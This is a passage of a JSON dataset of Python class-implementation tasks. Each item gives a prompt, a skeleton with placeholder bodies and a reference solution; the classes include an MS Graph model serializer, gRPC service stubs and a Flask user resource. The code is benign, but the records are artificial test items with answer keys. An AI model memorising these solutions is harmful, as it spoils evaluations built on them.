None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n<|end_body_0|>\n\n<|body_start_1|>\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: 
setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000200", "length_bytes": 4766, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005170", "prompt": "Implement the Python class `AccessReviewHistoryInstance` described below.\n\nClass description:\nImplement the AccessReviewHistoryInstance class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `AccessReviewHistoryInstance` described below.\n\nClass description:\nImplement the AccessReviewHistoryInstance class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) 
-> AccessReviewHistoryInstance: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass AccessReviewHistoryInstance:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n<|end_body_0|>\n\n<|body_start_1|>\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass AccessReviewHistoryInstance:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance 
of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccessReviewHistoryInstance:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> AccessReviewHistoryInstance:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: AccessReviewHistoryInstance\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return AccessReviewHistoryInstance()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n from .access_review_history_status import AccessReviewHistoryStatus\n from .entity import Entity\n fields: Dict[str, Callable[[Any], None]] = {'downloadUri': lambda n: setattr(self, 'download_uri', n.get_str_value()), 'expirationDateTime': lambda n: setattr(self, 'expiration_date_time', n.get_datetime_value()), 'fulfilledDateTime': lambda n: setattr(self, 'fulfilled_date_time', n.get_datetime_value()), 'reviewHistoryPeriodEndDateTime': lambda n: setattr(self, 'review_history_period_end_date_time', n.get_datetime_value()), 'reviewHistoryPeriodStartDateTime': lambda n: setattr(self, 'review_history_period_start_date_time', n.get_datetime_value()), 'runDateTime': lambda n: setattr(self, 'run_date_time', n.get_datetime_value()), 'status': lambda n: setattr(self, 'status', n.get_enum_value(AccessReviewHistoryStatus))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('downloadUri', self.download_uri)\n writer.write_datetime_value('expirationDateTime', self.expiration_date_time)\n writer.write_datetime_value('fulfilledDateTime', self.fulfilled_date_time)\n writer.write_datetime_value('reviewHistoryPeriodEndDateTime', self.review_history_period_end_date_time)\n writer.write_datetime_value('reviewHistoryPeriodStartDateTime', self.review_history_period_start_date_time)\n writer.write_datetime_value('runDateTime', self.run_date_time)\n writer.write_enum_value('status', self.status)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/access_review_history_instance.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "aa3939779729620426105e1b734ddc076c0c91b7", "bodies": 
["context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')"], "bodies_text": "<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "class_docstring": "Proto file describing the Customer Label service. Service to manage labels on customers.", "class_name": "CustomerLabelServiceServicer", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-generic-cla"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n <|body_0|>\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. Operation statuses are returned.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000201", "length_bytes": 3479, "license_type": "permissive", "methods": [{"docstring": "Returns the requested customer-label relationship in full detail.", "name": "GetCustomerLabel", "signature": "def GetCustomerLabel(self, request, context)"}, {"docstring": "Creates and removes customer-label relationships. Operation statuses are returned.", "name": "MutateCustomerLabels", "signature": "def MutateCustomerLabels(self, request, context)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000686", "prompt": "Implement the Python class `CustomerLabelServiceServicer` described below.\n\nClass description:\nProto file describing the Customer Label service. Service to manage labels on customers.\n\nMethod signatures and docstrings:\n- def GetCustomerLabel(self, request, context): Returns the requested customer-label relationship in full detail.\n- def MutateCustomerLabels(self, request, context): Creates and removes customer-label relationships. Operation statuses are returned.", "prompted_full_text": "Implement the Python class `CustomerLabelServiceServicer` described below.\n\nClass description:\nProto file describing the Customer Label service. Service to manage labels on customers.\n\nMethod signatures and docstrings:\n- def GetCustomerLabel(self, request, context): Returns the requested customer-label relationship in full detail.\n- def MutateCustomerLabels(self, request, context): Creates and removes customer-label relationships. Operation statuses are returned.\n\n<|skeleton|>\nclass CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. 
Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n <|body_0|>\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. Operation statuses are returned.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "revision_id": "0fc8a7dbf31d9e8e2a4364df93bec5f6b7edd50a", "skeleton": "<|skeleton|>\nclass CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n <|body_0|>\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. Operation statuses are returned.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomerLabelServiceServicer:\n \"\"\"Proto file describing the Customer Label service. Service to manage labels on customers.\"\"\"\n\n def GetCustomerLabel(self, request, context):\n \"\"\"Returns the requested customer-label relationship in full detail.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def MutateCustomerLabels(self, request, context):\n \"\"\"Creates and removes customer-label relationships. 
Operation statuses are returned.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n", "source": "the_stack_v2_python_sparse", "source_path": "google/ads/google_ads/v1/proto/services/customer_label_service_pb2_grpc.py", "source_repo": "juanmacugat/google-ads-python", "split": "test", "star_events_count": 1} {"blob_id": "d0edc79db99e52ef101296d89d9ea8fc6661c7fb", "bodies": ["user = UserModel.query.get(user_id)\nif not user:\n abort(404, error=f'No user with id={user_id}')\nreturn (user, 200)", "user = UserModel.query.get(user_id)\nif not user:\n abort(404, error=f'No user with id={user_id}')\nuser.username = kwargs['username']\ntry:\n user.save()\n return (user, 200)\nexcept:\n abort(404, error=f'An error occurred while changing the user')", "user = UserModel.query.get(user_id)\nif not user:\n abort(404, error=f'User with id={user_id} is not exists')\ntry:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\nexcept:\n abort(404, error=f'An error occurred while deleting the user')"], "bodies_text": "<|body_start_0|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n<|end_body_0|>\n\n<|body_start_1|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n<|end_body_1|>\n\n<|body_start_2|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n<|end_body_2|>\n", "class_docstring": "", "class_name": "UserResource", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserResource:\n\n def get(self, user_id):\n \"\"\"Returns a user by id. :param user_id: user id :return: the user\"\"\"\n <|body_0|>\n\n def put(self, user_id, **kwargs):\n \"\"\"Updates a user by id. :param user_id: user id :param kwargs: parameters for updating the user :return: the user\"\"\"\n <|body_1|>\n\n def delete(self, user_id):\n \"\"\"Deletes a user by id. :param user_id: user id :return: the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n<|end_body_0|>\n\n<|body_start_1|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n<|end_body_1|>\n\n<|body_start_2|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000202", "length_bytes": 3510, "license_type": "no_license", "methods": [{"docstring": "Returns a user by id. 
:param user_id: user id :return: the user", "name": "get", "signature": "def get(self, user_id)"}, {"docstring": "Updates a user by id. :param user_id: user id :param kwargs: parameters for updating the user :return: the user", "name": "put", "signature": "def put(self, user_id, **kwargs)"}, {"docstring": "Deletes a user by id. :param user_id: user id :return: the user", "name": "delete", "signature": "def delete(self, user_id)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003268", "prompt": "Implement the Python class `UserResource` described below.\n\nClass description:\nImplement the UserResource class.\n\nMethod signatures and docstrings:\n- def get(self, user_id): Returns a user by id. :param user_id: user id :return: the user\n- def put(self, user_id, **kwargs): Updates a user by id. :param user_id: user id :param kwargs: parameters for updating the user :return: the user\n- def delete(self, user_id): Deletes a user by id. :param user_id: user id :return: the user", "prompted_full_text": "Implement the Python class `UserResource` described below.\n\nClass description:\nImplement the UserResource class.\n\nMethod signatures and docstrings:\n- def get(self, user_id): Returns a user by id. :param user_id: user id :return: the user\n- def put(self, user_id, **kwargs): Updates a user by id. :param user_id: user id :param kwargs: parameters for updating the user :return: the user\n- def delete(self, user_id): Deletes a user by id. :param user_id: user id :return: the user\n\n<|skeleton|>\nclass UserResource:\n\n def get(self, user_id):\n \"\"\"Returns a user by id. :param user_id: user id :return: the user\"\"\"\n <|body_0|>\n\n def put(self, user_id, **kwargs):\n \"\"\"Updates a user by id. :param user_id: user id :param kwargs: parameters for updating the user :return: the user\"\"\"\n <|body_1|>\n\n def delete(self, user_id):\n \"\"\"Deletes a user by id. :param user_id: user id :return: the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n<|end_body_0|>\n\n<|body_start_1|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n<|end_body_1|>\n\n<|body_start_2|>\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n<|end_body_2|>\n", "revision_id": "adb9a3f4524ab76e8ba656344e2ed452e87b577c", "skeleton": "<|skeleton|>\nclass UserResource:\n\n def get(self, user_id):\n \"\"\"Returns a user by id. :param user_id: user id :return: the user\"\"\"\n <|body_0|>\n\n def put(self, user_id, **kwargs):\n \"\"\"Updates a user by id. :param user_id: user id :param kwargs: parameters for updating the user :return: the user\"\"\"\n <|body_1|>\n\n def delete(self, user_id):\n \"\"\"Deletes a user by id. 
:param user_id: user id :return: the user\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserResource:\n def get(self, user_id):\n \"\"\"Returns a user by id. :param user_id: user id :return: the user\"\"\"\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n return (user, 200)\n\n def put(self, user_id, **kwargs):\n \"\"\"Updates a user by id. :param user_id: user id :param kwargs: parameters for updating the user :return: the user\"\"\"\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'No user with id={user_id}')\n user.username = kwargs['username']\n try:\n user.save()\n return (user, 200)\n except:\n abort(404, error=f'An error occurred while changing the user')\n\n def delete(self, user_id):\n \"\"\"Deletes a user by id. :param user_id: user id :return: the user\"\"\"\n user = UserModel.query.get(user_id)\n if not user:\n abort(404, error=f'User with id={user_id} is not exists')\n try:\n user.delete()\n return (f'User with id={user_id} deleted', 200)\n except:\n abort(404, error=f'An error occurred while deleting the user')\n", "source": "the_stack_v2_python_sparse", "source_path": "api/resources/user.py", "source_repo": "UshakovAleksandr/Blog", "split": "test", "star_events_count": 1} {"blob_id": "8d74211a93a897cb91c7b74138170917e9240673", "bodies": ["if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\nelse:\n raise Exception('You cannot create another BusSingleton class')", "if not BusSingleton.__instance__:\n BusSingleton()\nreturn BusSingleton.__instance__"], "bodies_text": "<|body_start_0|>\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n<|end_body_0|>\n\n<|body_start_1|>\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n<|end_body_1|>\n", "class_docstring": "", "class_name": "BusSingleton", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BusSingleton:\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n<|end_body_0|>\n\n<|body_start_1|>\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000203", "length_bytes": 545, "license_type": "no_license", "methods": [{"docstring": "Constructor.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Static method to fetch the current instance.", "name": "get_instance", "signature": "def get_instance()"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000717", "prompt": "Implement the Python class `BusSingleton` described below.\n\nClass description:\nImplement the BusSingleton class.\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor.\n- def get_instance(): Static method to fetch the current instance.", "prompted_full_text": "Implement the Python class 
`BusSingleton` described below.\n\nClass description:\nImplement the BusSingleton class.\n\nMethod signatures and docstrings:\n- def __init__(self): Constructor.\n- def get_instance(): Static method to fetch the current instance.\n\n<|skeleton|>\nclass BusSingleton:\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n<|end_body_0|>\n\n<|body_start_1|>\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n<|end_body_1|>\n", "revision_id": "1f7f98953a46eb490a5fe8b427371d343f8b0bf6", "skeleton": "<|skeleton|>\nclass BusSingleton:\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n <|body_0|>\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BusSingleton:\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n if BusSingleton.__instance__ is None:\n BusSingleton.__instance__ = bootstrap.bootstrap()\n else:\n raise Exception('You cannot create another BusSingleton class')\n\n def get_instance():\n \"\"\"Static method to fetch the current instance.\"\"\"\n if not BusSingleton.__instance__:\n BusSingleton()\n return BusSingleton.__instance__\n", "source": "the_stack_v2_python_sparse", "source_path": "src/user-management/utils/bus_singleton.py", "source_repo": "asamehinmobly/User-Management", "split": "test", "star_events_count": 0} {"blob_id": "d67b74109768d9e365b61646f3162ea5ebbd4307", "bodies": ["initial = []\nfor prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\nAddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\nformset = AddAddressFormSet(initial=initial)\nreturn self.render(request, 'found.html', formset=formset)", "AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\nformset = AddAddressFormSet(request.POST)\nc = 0\nif formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\nself.message_user(request, '%d prefixes are imported' % c)\nreturn self.response_redirect('ip:ipam:index')"], "bodies_text": "<|body_start_0|>\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n<|end_body_0|>\n\n<|body_start_1|>\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if 
formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return self.response_redirect('ip:ipam:index')\n<|end_body_1|>\n", "class_docstring": "Route import application", "class_name": "RouteImportAppplication", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RouteImportAppplication:\n \"\"\"Route import application\"\"\"\n\n def render_result(self, request, result):\n \"\"\"Display form with imported data :param request: :param result: :return:\"\"\"\n <|body_0|>\n\n def view_submit(self, request):\n \"\"\"Submit imported data :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n initial = []\n for prefix in result:\n description, objects = result[prefix]\n initial += [{'prefix': prefix, 'description': description, 'objects': ', '.join(objects)}]\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(initial=initial)\n return self.render(request, 'found.html', formset=formset)\n<|end_body_0|>\n\n<|body_start_1|>\n AddAddressFormSet = formset_factory(self.AddAddressForm, extra=0, can_delete=True)\n formset = AddAddressFormSet(request.POST)\n c = 0\n if formset.is_valid():\n vrf = VRF.get_global()\n asn = AS.default_as()\n for form in formset.forms:\n if 'DELETE' in form.cleaned_data and form.cleaned_data['DELETE']:\n continue\n try:\n prefix = IP.prefix(form.cleaned_data['prefix'])\n except AttributeError:\n continue\n description = form.cleaned_data['description']\n p, created = Prefix.objects.get_or_create(vrf=vrf, afi=prefix.afi, prefix=prefix.normalized.prefix, defaults={'asn': asn, 'description': description})\n if created:\n c += 1\n self.message_user(request, '%d prefixes are imported' % c)\n return self.response_redirect('ip:ipam:index')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000204", "length_bytes": 5449, "license_type": "permissive", "methods": [{"docstring": "Display form with imported data :param request: :param result: :return:", "name": "render_result", "signature": "def render_result(self, request, result)"}, {"docstring": "Submit imported data :param request: :return:", "name": "view_submit", "signature": "def view_submit(self, request)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003302", "prompt": "Implement the Python class `RouteImportAppplication` described below.\n\nClass description:\nRoute import application\n\nMethod signatures and docstrings:\n- def render_result(self, request, result): Display form with imported data :param request: :param result: :return:\n- def view_submit(self, request): Submit imported data :param request: :return:", "prompted_full_text": "Implement the Python class `RouteImportAppplication` described below.\n\nClass description:\nRoute import application\n\nMethod signatures and docstrings:\n- def render_result(self, request, result): Display form with imported data :param request: :param result: :return:\n- def view_submit(self, 
